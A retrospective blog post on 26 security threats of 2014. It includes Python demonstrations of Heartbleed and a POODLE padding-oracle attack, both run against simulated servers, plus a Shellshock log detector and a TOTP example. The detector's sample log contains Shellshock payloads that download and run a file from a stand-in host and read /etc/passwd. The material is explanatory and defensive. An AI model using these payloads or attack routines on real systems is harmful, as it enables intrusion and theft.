2014 was another banner year for security events, with hacks of major financial institutions and retailers leading the way in notoriety and other, more critical services not far behind. In addition to breaches of information, we also saw several disturbing events that shook the core of Internet security, privacy and infrastructure. The only thing more disturbing than the hacks themselves is how commonplace they have become; many people just shrug their shoulders and consider this the new normal.
As 2014 draws to a close, let’s take a look back at the 26 worst security threats of 2014.
1. Heartbleed
OpenSSL, the library behind a large share of the world’s SSL/TLS servers, turned out to have a bug (CVE-2014-0160) in its implementation of the TLS heartbeat extension, the keep-alive feature that lets a session stay open without a new handshake. The server copied as many bytes into its heartbeat reply as the requester claimed to have sent, without checking that claim against the size of the record it had actually received, so a single request could return up to 64 KB of whatever happened to sit next to that record in server memory. That could be session cookies, credentials in flight, or the server’s private key, which in turn lets an attacker decrypt captured traffic wherever forward secrecy was not in use. OpenSSL was quickly patched, but sysadmins are still struggling to get all systems up to date nine months later, and any certificate that lived on a vulnerable server should have been re-issued, not just patched around.
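The bug is easier to see in code than in prose. The following is an added illustration, not OpenSSL’s code and not from the original post: a heartbeat message laid out as RFC 6520 defines it (one type byte, a two-byte payload length, the payload, then at least 16 bytes of padding), a handler that mirrors the pre-1.0.1g logic of trusting the length field, and a handler with the same bounds check OpenSSL 1.0.1g added. The “heap” here is just a constructed byte string placed right after the received record; the session id and key fragment in it are made up.

```python
import struct
from typing import Optional, Tuple

HEARTBEAT_REQUEST, HEARTBEAT_RESPONSE = 1, 2
MIN_PADDING = 16  # RFC 6520: at least 16 bytes of random padding follow the payload

# Constructed stand-in for whatever sat after the record in the server's heap.
# The attacker cannot know in advance what it holds; that is the point.
ADJACENT_HEAP = b"session_id=9f1c...; -----BEGIN RSA PRIVATE KEY-----\nMIIEow..."


def build_heartbeat(payload: bytes, claimed_len: Optional[int] = None) -> bytes:
    """Heartbeat request: type, 16-bit payload length, payload, padding.
    A benign client claims the real length; the Heartbleed request claims
    up to 65535 bytes while sending only a handful."""
    length = len(payload) if claimed_len is None else claimed_len
    return struct.pack("!BH", HEARTBEAT_REQUEST, length) + payload + b"\x00" * MIN_PADDING


def vulnerable_handler(heap: bytes, record_len: int) -> bytes:
    """Mirrors the pre-1.0.1g logic: trust the length field and copy that many
    bytes starting at the payload, never comparing it with record_len."""
    hbtype, payload_len = struct.unpack("!BH", heap[:3])
    if hbtype != HEARTBEAT_REQUEST:
        return b""
    payload = heap[3:3 + payload_len]  # runs past the record when payload_len is a lie
    return struct.pack("!BH", HEARTBEAT_RESPONSE, payload_len) + payload + b"\x00" * MIN_PADDING


def patched_handler(heap: bytes, record_len: int) -> bytes:
    """The fix: drop records too short to hold type, length and padding, and
    drop any whose claimed payload would not fit inside the record."""
    if record_len < 1 + 2 + MIN_PADDING:
        return b""
    hbtype, payload_len = struct.unpack("!BH", heap[:3])
    if hbtype != HEARTBEAT_REQUEST or 1 + 2 + payload_len + MIN_PADDING > record_len:
        return b""  # silently discarded, as OpenSSL 1.0.1g does
    payload = heap[3:3 + payload_len]
    return struct.pack("!BH", HEARTBEAT_RESPONSE, payload_len) + payload + b"\x00" * MIN_PADDING


def leaked_bytes(response: bytes, sent_payload: bytes) -> bytes:
    """Whatever the reply echoes beyond the payload the client sent and the
    record's own padding came from the server's memory."""
    if not response:
        return b""
    payload_len = struct.unpack("!BH", response[:3])[1]
    echoed = response[3:3 + payload_len]
    return echoed[len(sent_payload) + MIN_PADDING:]


def demo(claimed_len: int = 60) -> Tuple[bytes, bytes]:
    """One malicious heartbeat against both handlers.
    Returns (leak from vulnerable server, leak from patched server)."""
    sent = b"ping"
    request = build_heartbeat(sent, claimed_len)
    heap = request + ADJACENT_HEAP  # the record sits directly in front of other data
    vuln = vulnerable_handler(heap, len(request))
    fixed = patched_handler(heap, len(request))
    return leaked_bytes(vuln, sent), leaked_bytes(fixed, sent)


if __name__ == "__main__":
    leak, nothing = demo()
    print("vulnerable server leaked:", leak)
    print("patched server leaked:", nothing)
```

A real attacker repeats the request thousands of times, because each reply reveals a different 64 KB window depending on what the allocator hands out; the check that fixes it is the single comparison against record_len.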
2. Poodle
Less renowned, the POODLE vulnerability (CVE-2014-3566) is a weakness in SSL 3.0 itself rather than in any one implementation. SSL 3.0 checks only the last byte of the CBC padding, so an attacker on the network path who can make the victim’s browser send the same request over and over with a chosen alignment can use the server’s accept-or-reject behaviour as an oracle and recover secrets such as session cookies one byte at a time, at roughly 256 requests per byte. Modern browsers negotiate TLS, but most would fall back to SSL 3.0 if the attacker interfered with the handshake, which is what made the bug exploitable in practice. Many organizations have disabled SSL 3.0, but it is still out there.
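To show why “only the last padding byte is checked” is enough to break the protocol, here is an added, self-contained simulation of the attack (not part of the original post, and not code from any real SSL stack). A toy 16-byte Feistel block cipher built on SHA-256 stands in for AES or 3DES, HMAC-SHA256 stands in for SSL 3.0’s MAC, the SECRET cookie is made up, and the attacker is modelled as someone who can make the “browser” re-send a request with a chosen prefix and suffix and then forward a tampered copy of the record to the server. The only thing that changes between the SSL 3.0 and TLS servers is the padding check.

```python
import hashlib
import hmac
import random
from typing import Callable, Optional

BLOCK, MAC_LEN = 16, 32
SECRET = b"Cookie: auth=s3cr3t-token"  # constructed: what the attacker is after


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _rand(rng: random.Random, n: int) -> bytes:
    return bytes(rng.getrandbits(8) for _ in range(n))


# Toy 16-byte block cipher (4-round Feistel over SHA-256) standing in for AES/3DES.
def _round(key: bytes, half: bytes, rnd: int) -> bytes:
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def block_encrypt(key: bytes, blk: bytes) -> bytes:
    l, r = blk[:8], blk[8:]
    for rnd in range(4):
        l, r = r, _xor(l, _round(key, r, rnd))
    return l + r


def block_decrypt(key: bytes, blk: bytes) -> bytes:
    l, r = blk[:8], blk[8:]
    for rnd in reversed(range(4)):
        l, r = _xor(r, _round(key, l, rnd)), l
    return l + r


# The entire difference between the two protocol versions is in these two functions.
def ssl3_padding_ok(plain: bytes) -> bool:
    """SSL 3.0: the last byte is the pad length; the pad bytes are never inspected."""
    n = plain[-1]
    return n < BLOCK and len(plain) >= n + 1 + MAC_LEN


def tls_padding_ok(plain: bytes) -> bool:
    """TLS 1.0 and later: every pad byte must equal the length byte."""
    n = plain[-1]
    return n < BLOCK and len(plain) >= n + 1 + MAC_LEN and plain[-(n + 1):] == bytes([n]) * (n + 1)


class Server:
    """MAC-then-encrypt CBC records, as SSL 3.0 does. The 'browser' asks it to
    encrypt a request; the attacker forwards a tampered copy and watches the verdict."""

    def __init__(self, padding_check: Callable[[bytes], bool], seed: int = 2014):
        self.rng = random.Random(seed)  # seeded only so the demo is repeatable
        self.key = _rand(self.rng, 16)
        self.padding_check = padding_check

    def encrypt_record(self, data: bytes) -> bytes:
        body = data + hmac.new(self.key, data, hashlib.sha256).digest()
        pad_len = BLOCK - 1 - len(body) % BLOCK  # a full block of padding when body is block-aligned
        body += bytes([pad_len]) * (pad_len + 1)
        iv = _rand(self.rng, BLOCK)  # fresh chaining value per record
        out, prev = [iv], iv
        for i in range(0, len(body), BLOCK):
            prev = block_encrypt(self.key, _xor(body[i:i + BLOCK], prev))
            out.append(prev)
        return b"".join(out)

    def accepts(self, record: bytes) -> bool:
        blocks = [record[i:i + BLOCK] for i in range(0, len(record), BLOCK)]
        plain = b"".join(_xor(block_decrypt(self.key, c), p) for p, c in zip(blocks, blocks[1:]))
        if not self.padding_check(plain):
            return False
        body = plain[:-(plain[-1] + 1)]
        data, mac = body[:-MAC_LEN], body[-MAC_LEN:]
        return hmac.compare_digest(mac, hmac.new(self.key, data, hashlib.sha256).digest())


def recover_byte(server: Server, j: int, budget: int = 20000) -> Optional[int]:
    """Line SECRET[j] up as the last byte of some block and make the padding a
    full block, then swap the target block into the padding position. SSL 3.0
    accepts exactly when D(C_t)[15] XOR C_n[15] == 15, which reveals the byte."""
    p = (BLOCK - 1 - j) % BLOCK                      # attacker-controlled prefix length
    s = -(p + len(SECRET) + MAC_LEN) % BLOCK         # suffix so data+MAC is block-aligned
    data = b"A" * p + SECRET + b"B" * s
    t = (p + j) // BLOCK + 1                         # block holding SECRET[j] (IV is block 0)
    for _ in range(budget):
        record = server.encrypt_record(data)         # the browser re-sends the request
        blocks = [record[i:i + BLOCK] for i in range(0, len(record), BLOCK)]
        tampered = b"".join(blocks[:-1]) + blocks[t]  # padding block replaced by the target block
        if server.accepts(tampered):
            return (BLOCK - 1) ^ blocks[-2][-1] ^ blocks[t - 1][-1]
    return None


def recover_secret(server: Server, budget: int = 20000) -> Optional[bytes]:
    out = bytearray()
    for j in range(len(SECRET)):
        b = recover_byte(server, j, budget)
        if b is None:
            return None
        out.append(b)
    return bytes(out)


if __name__ == "__main__":
    print("SSL 3.0 server:", recover_secret(Server(ssl3_padding_ok)))
    print("TLS server:", recover_byte(Server(tls_padding_ok), 0, budget=2000))
```

Against the SSL 3.0 server the loop recovers the whole cookie in a few thousand forwarded records; against the TLS-style check the same tampered block would have to decrypt to sixteen identical bytes, so the oracle never fires. Disabling SSL 3.0 (or, where that is impossible for a while, deploying TLS_FALLBACK_SCSV so a downgraded handshake is rejected) is the fix.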
3. Shellshock
Multiple vulnerabilities in the Bash shell, starting with CVE-2014-6271, were announced in September. Bash is the default shell on most Linux distributions, many Unix systems and OS X, and it ships inside dozens of major vendors’ network gear. The bug was in the way Bash imported function definitions from environment variables: it kept executing whatever followed the function body. So any service that passes attacker-controlled input into the environment of a Bash process, such as a web server running CGI scripts (where HTTP headers become environment variables), a DHCP client that runs hook scripts, or an SSH server with a forced command, hands the attacker remote command execution. The potential impact is devastating when the core networking components of practically all networks include systems vulnerable to this. Vendors are still working on releasing updates for all the impacted systems three months later. These include
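Because the CGI vector puts the payload straight into the web server’s access log, Shellshock probing is one of the easier things to detect after the fact. The script below is an added example, not from the original post: it parses Apache “combined” log lines, percent-decodes the request line (QUERY_STRING reaches a CGI script as an environment variable too), and flags any field that starts a Bash function definition. The sample lines are constructed; the addresses, paths and download host are made up, and the payloads only follow the general shape of the 2014 probes.

```python
import re
from collections import Counter
from typing import Dict, List, Optional
from urllib.parse import unquote

# Constructed sample lines in Apache "combined" format (not a real log).
SAMPLE_LOG = """
203.0.113.7 - - [25/Sep/2014:10:14:02 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c 'wget http://198.51.100.9/x -O /tmp/x; sh /tmp/x'"
198.51.100.23 - - [25/Sep/2014:10:14:05 +0000] "GET /index.html HTTP/1.1" 200 2048 "http://example.com/" "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"
203.0.113.7 - - [25/Sep/2014:10:15:41 +0000] "GET /cgi-bin/test.sh HTTP/1.1" 404 209 "() { :; }; /bin/bash -c 'cat /etc/passwd'" "curl/7.37.0"
192.0.2.44 - - [25/Sep/2014:10:16:00 +0000] "GET /search?q=%28%29%20%7B%20%3A%3B%7D%3B%20id HTTP/1.1" 200 77 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36"
192.0.2.45 - - [25/Sep/2014:10:16:30 +0000] "POST /app/login HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) Chrome/37.0.2062.124"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Bash only imports a variable as a function when its value starts with "() {";
# the tolerant whitespace just catches sloppy copies of the payload.
SHELLSHOCK = re.compile(r"\(\)\s*\{")


def parse_combined(line: str) -> Optional[Dict[str, str]]:
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_shellshock(log_text: str) -> List[Dict[str, str]]:
    """One hit per matching field. Request lines are percent-decoded first."""
    hits = []
    for line in log_text.strip().splitlines():
        rec = parse_combined(line)
        if rec is None:
            continue  # a malformed line is worth a look too, but not in this pass
        for field in ("request", "referer", "agent"):
            value = unquote(rec[field]) if field == "request" else rec[field]
            if SHELLSHOCK.search(value):
                hits.append({"ip": rec["ip"], "time": rec["time"], "field": field,
                             "status": rec["status"], "payload": value})
    return hits


def sources(hits: List[Dict[str, str]]) -> Dict[str, int]:
    """Probes per source address, for blocking and for prioritising follow-up."""
    return dict(Counter(h["ip"] for h in hits))


if __name__ == "__main__":
    for h in find_shellshock(SAMPLE_LOG):
        print(f'{h["time"]} {h["ip"]} {h["field"]:8} HTTP {h["status"]}  {h["payload"]}')
    print(sources(find_shellshock(SAMPLE_LOG)))
```

A hit is evidence of an attempt, not of success: a 200 on a CGI path means the script ran, but whether Bash was still vulnerable at that moment has to be checked against the patch history of the host. Treat the source addresses as scanners and look for the outbound connection (here, the wget to the download host) in the proxy or firewall logs.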
4. Unpatched Operating Systems
Until vendors make operating systems that patch themselves and cannot be stopped from doing so (not unlike how browsers are starting to behave), unpatched operating systems will continue to be a threat, or rather, vulnerable to myriad threats. Since a compromised operating system connected to your network gives attackers a foothold, it becomes a threat to the rest of your network. Whether it’s a server in the data center or a laptop that comes in from the cold, if it’s not current on all its patches, it’s a threat to everything else.
5. Unpatchable Operating Systems
Have you heard that Disney song by Idina Menzel from Frozen, “Let It Go”? She’s singing about Windows XP, older unsupported versions of iOS and Mac OS X, and any other operating system or firmware that is no longer supported by the vendor. If you cannot patch it, get rid of it, because you know that attackers are continuing to look for ways to exploit what cannot be patched. Where a legacy box truly cannot be retired yet, isolate it: no Internet access, a firewall between it and the rest of the network, and only the ports its one remaining job needs.
6. Adobe applications
We use PDFs six of every seven days of the week, and Flash is still prevalent (perhaps even dominant) on the web. But if you take a quick run through 2014’s most severe vulnerabilities as scored in the National Vulnerability Database, most of the CVEs with a CVSS base score of 10 belong to Adobe products. Does that mean you should stop using them? Of course not. But it does mean that you need to patch those things just as frequently as you do your operating systems, and you’d better get a patch management application that can handle this for you, because manually upgrading Acrobat and Flash on all your workstations every month is no easy task. Disabling Flash where it is not needed, and setting it to click-to-play where it is, shrinks the exposure further.
7. Browsers
You could almost call this section ‘legacy applications’, since the only reason most companies still have IE8 (or earlier) around is some lame ERP application that just won’t work with a current browser. However, it’s not really the app that is the threat… it’s all the compromised web sites and malicious code that users will reach with the old browser. If you must keep IE8 around, consider virtualizing it and locking it down so it can only reach your legacy apps, and put a current browser on the desktop for everything else. And you really should check out IE11 in Enterprise Mode. You’d be surprised at how well it works with most legacy ERPs.
8. Older Office suites
Just as XP and IE8 should go the way of the dinosaurs, so should older versions of the Office suites. Office 2007 is still in extended support, so it at least gets security updates, but only at its current service pack level: anything older than Office 2007 SP3 should be brought up to SP3 or dumped, and Office 2003 and earlier, which lost support in April 2014, should be gone already.
9. Advanced persistent threat
More a class of threat than any one specific threat, APT is going to continue to grow in prominence and impact pretty much from now until the end of time. The long-running, orchestrated and focused attacks may take months to pay off, but when they do, the attacker owns the target. Tireless vigilance in patching and configuration raises the cost, but a determined attacker will eventually find a way in, so plan for detection and response as seriously as for prevention.
10. Malware
Downloads, malicious websites, infected attachments in email, or the more traditional attack vectors like infected files on network shares; however malware gets in, once it infects a machine you really have no better option than to nuke it from orbit and rebuild from a known-good image. As long as there are computers, there will be malware, and the best thing you can do is ensure that 100% of your systems run antimalware that updates multiple times per day. Have real-time scanning enabled, and run scheduled scans at least weekly, but don’t mistake a clean scan for proof that a box was never compromised.
11. Ransomware
Arguably the most insidious form of malware is ransomware. This malware encrypts the victim’s data and then holds it for ransom. Pay off the attacker and you might get the decryption key to recover your files, or you might just be out the money. The only reliable defence is backups the malware cannot reach: kept offline or on media a compromised workstation cannot write to, and tested by actually restoring from them.
12. Phishing attacks
Phishing attacks, and the more targeted spear phishing attacks, go after users’ financial information, credentials, and more. They use social engineering to talk users into revealing what they should know better than to reveal, and they continue to be an effective attack against individuals and businesses.
13. Single factor authentication
Account compromise can be made far harder by using strong, unique credentials and requiring a second factor of authentication, like a hardware token, certificate, mobile app, or even a text message (the weakest of these, but far better than nothing). The threat is that too few banks, email services, or other service providers offer this option, fewer still require it, and most make it too difficult for regular users to use. This leaves everyone open to account compromise from an attacker who either grabs creds from another site or just makes a lucky guess.
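The “mobile app” option is less magic than it looks, which is worth knowing before you tell users to trust it. The following is an added example, not from the original post: time-based one-time passwords as RFC 6238 defines them (the scheme behind Google Authenticator and similar apps), in pure Python, with the verification side tolerating a little clock drift and reporting which time step matched so the server can refuse a replayed code. The secret is the RFC’s own test vector; the account name and issuer in the provisioning URI are made up.

```python
import base64
import hashlib
import hmac
import struct
import time
from typing import Optional
from urllib.parse import quote

# RFC 6238 test-vector secret (ASCII "12345678901234567890"). A real deployment
# generates 20 random bytes per user, e.g. secrets.token_bytes(20), and stores
# them as carefully as a password hash.
DEMO_SECRET = b"12345678901234567890"


def hotp(secret: bytes, counter: int, digits: int = 6, algo=hashlib.sha1) -> str:
    """RFC 4226: HMAC over the big-endian counter, then dynamic truncation."""
    mac = hmac.new(secret, struct.pack(">Q", counter), algo).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: bytes, at: Optional[float] = None, step: int = 30,
         digits: int = 6, algo=hashlib.sha1) -> str:
    """RFC 6238: HOTP with the counter derived from the clock."""
    now = time.time() if at is None else at
    return hotp(secret, int(now) // step, digits, algo)


def verify_totp(secret: bytes, code: str, at: Optional[float] = None, step: int = 30,
                digits: int = 6, window: int = 1, algo=hashlib.sha1) -> Optional[int]:
    """Accept a code from the current step or up to `window` steps either side
    (clock drift on the phone). Returns the matching step so the caller can
    store it and reject any later code for that step or an earlier one; None
    means no match. The comparison is constant-time."""
    now = time.time() if at is None else at
    current = int(now) // step
    for delta in range(-window, window + 1):
        candidate = current + delta
        if hmac.compare_digest(hotp(secret, candidate, digits, algo), code):
            return candidate
    return None


def provisioning_uri(secret: bytes, account: str, issuer: str,
                     digits: int = 6, step: int = 30) -> str:
    """The otpauth:// URI that authenticator apps read from an enrolment QR code."""
    b32 = base64.b32encode(secret).decode().rstrip("=")
    return (f"otpauth://totp/{quote(issuer)}:{quote(account)}?secret={b32}"
            f"&issuer={quote(issuer)}&algorithm=SHA1&digits={digits}&period={step}")


if __name__ == "__main__":
    print("current code:", totp(DEMO_SECRET))
    print(provisioning_uri(DEMO_SECRET, "alice@example.com", "Example Corp"))
```

Two things this makes obvious: the phone needs nothing but the shared secret and a clock, so a secret copied out of a database enrols the attacker just as well as the user; and a six-digit code with a one-step window gives an online guesser three chances in a million per attempt, so rate-limit failed attempts and remember the last accepted step.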
14. No encryption for data at rest
The threat is data theft, leakage and loss. It comes from data that is physically accessible. Laptops, portable disks, tapes, tablets, mobile phones, and thumb drives all tend to grow wings and fly away. The data stored on these errant devices could so easily be protected by encryption, but too few companies require it, and on Windows full-disk encryption (BitLocker) ships only in the Pro and Enterprise editions. Enterprises should make encryption 100% mandatory, with recovery keys escrowed somewhere the help desk can reach them, and operating systems for consumers should offer easy-to-use encryption for all removable and fixed media out of the box.
15. No encryption for data in transit
Similar to the above, the threats come from information leakage and violations of privacy. For any access to any system over the network, encryption should be the rule. Even when the data is neither confidential nor in need of integrity protection, encryption provides privacy for users, and practically every protocol in use today offers an encrypted version. It only buys what you think it does if the client also verifies the server’s certificate; an encrypted connection to an unverified endpoint stops passive sniffing but not an active attacker in the middle.
16. USB devices
Unknown, untrusted, and even shrink-wrapped USB devices can present threats to your systems. The recently published BadUSB research showed that the firmware on USB thumb drives, mice, and keyboards can be rewritten so that the device lies about what it is: a ‘thumb drive’ can announce itself as a keyboard and type commands the moment it is plugged in, or as a network adapter that redirects the host’s traffic, and no file scanner will see any of it because the malicious code lives in the controller, not in the storage. Endpoint protection is a must for enterprises, as is a secure configuration that scans storage devices upon connection, restricts which device classes users may attach, and prevents booting from USB unless explicitly enabled.
17. BYOD
End users are scrambling to use their shiny new unmanaged mobile phones, tablets and home PCs to access corporate data. Often this charge is led by executives who have enough authority to overrule security. But how can you protect against threats from devices you cannot control? Giving BYOD devices network access only on isolated segments, designing your apps for secure remote access, and enforcing two-factor authentication can reduce the risk. Technologies that give you some degree of management over even personally owned devices, such as MDM, can protect you further.
18. Stolen credentials
Whether credentials are stolen through phishing, social engineering, shoulder surfing or cleartext interception, once an attacker has someone’s credentials they have a foothold that can be used to launch more attacks, gain access to data, or log on to other sites and applications where the user set up the same credentials. One valid username/password pair can provide an attacker with access to dozens of other systems whose only common element is that the victim uses them all. The best thing you can do for your customers and your users is to deploy two-factor authentication.
19. Stolen email addresses and passwords
Because so many people use their email address as their username, and the same password on site after site, a compromise of one site can easily lead to compromises of others. If you use the same username and password for your email as you do at your bank and some social networking site, a compromise of one can easily lead to a compromise of all. Do you think a dating site has the same level of security and attention to patching and configuration as your credit card company does? Use unique credentials on different systems, let a password manager remember them, and take advantage of two-factor authentication on every system that offers it.
20. Stolen personal data
When companies lose customer or employee personal data, the threat to people’s financial data and credit history is significant, but the threat to the company responsible for protecting that data goes much further than that. The loss of consumer confidence and repeat business is one thing, but the costs of providing credit monitoring to the victims can be huge, and a recent ruling in the Target breach litigation lets the banks’ claims go forward, so they can try to recoup their losses from fraudulent transactions and from replacing all those credit and debit cards. Target is going to feel the impact of this breach for years to come.
21. Excessive rights
Too many companies ignore the principle of least privilege, and the threats presented by users with more rights than they need can be extreme. Data loss can occur when users cut instead of copy, or delete data that they think only they access. When users are local admins on their systems, any malware that lands on the box runs as admin too, and has a much better chance of taking over the system and spreading from it.
22. Stale accounts
Stale accounts can be used by former employees, including former admins, to gain unauthorized access to systems long after their right to do so has passed. Companies that don’t review all accounts on all their systems, and disable or delete those no longer needed, run the risk of these accounts being used for inappropriate access. Tie the review to HR’s leaver process, and don’t forget service accounts and local accounts on appliances, which rarely show up in the directory.
23. No logging
Security incidents will occur. That’s a fact. When companies don’t log, don’t log in sufficient detail, or don’t review the logs that they keep, they run the risk of these incidents going undetected for months. Many of the most significant breaches of 2014 went on for weeks, and some apparently started in 2013 and went unnoticed until it was far too late. Ship logs to a central system that an attacker on a compromised host cannot wipe, keep them long enough to cover the dwell times we are now seeing, and actually look at them.
24. Default credentials
Routers, access points, applications and printers, to name but a few, ship with administrative accounts whose default credentials are printed in the manual and collected in lists all over the Internet. If sysadmins do not reset these as part of initial system configuration, they give attackers an easy way to compromise those systems, and a foothold from which to reach others.
25. No separation of networks
One thing became clear during 2014: too many retailers have little to no separation between their general networks and their point of sale systems. In numerous cases, attackers gained access to the companies’ networks over the Internet, and from there could reach PoS systems and credit card terminals. If you have high-value targets that do not need complete network access to function, firewall them off from the general network, allowing only the specific flows they need, to reduce the threat.
26. End users
The last entry on our list must first be remembered as the reason we have jobs. No end users, no need for sysadmins, so cut them some slack, but also remember that they are potentially the biggest threat we’ll face. They are human, they are not technical, and if we don’t provide them with protections and training, we cannot expect anything other than that end user mistakes will lead to security incidents. Help your users help you by providing the tools, training, policies, and explanations that enable them to work securely and safely, and you’ll help mitigate almost every other threat on this list.